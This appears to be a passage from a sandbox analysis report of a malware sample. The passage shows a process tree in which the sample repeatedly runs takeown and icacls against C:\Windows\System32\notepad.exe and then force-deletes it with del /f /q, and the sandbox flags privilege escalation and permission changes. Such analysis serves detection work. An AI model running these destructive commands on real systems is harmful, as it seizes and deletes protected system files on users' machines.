    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:8164
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:6932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:596
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5232
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:3744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5360
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2936
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:6060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5732
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:7148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6356
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      PID:6892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5596
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:6348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4960
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:6016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4476
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:3576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4948
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5528
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5492
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:6492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6540
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4128
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:6800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5620
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7700
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      PID:6460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5296
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:3308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4308
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5540
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:2012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7376
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      PID:7568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:8100
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:1876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4632
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:7560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4076
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:3028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5444
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:7096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7968
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:6496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5884
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:3756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5800
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:5448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:468
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:7396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6372
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5372
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:3260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:8176
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6920
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4316
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      PID:5400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5740
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:7368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4672
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:5716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5480
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:3276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5720
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4452
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:8044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6188
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:7292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4072
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6212
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6900
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6828
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:7096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6736
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6816
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:8164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4956
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5148
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5696
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:2040
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:1452
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:6308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5152
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6280
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5844
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:1636
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7132
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:6680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:2812
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:5704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6904
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:3684
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7140
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:7756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4448
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:4376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7592
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:7752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6664
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:1480
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:7040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:3084
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6236
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7532
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5972
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5300
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4888
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:8016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5944
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:1400
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:1032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6684
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:7184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:3328
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5900
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:3608
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:1132
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5872
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7008
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:2764
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7248
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:456
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6364
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:6708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6120
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7760
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4140
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7176
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:5244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7508
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:7444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7504
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:6404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7296
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7544
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:8136
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7632
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7708
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:8056
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:6972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:8108
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2248
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6648
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7936
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4596
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:2232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7728
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7040
- - C:\Windows\system32\cmd.exe
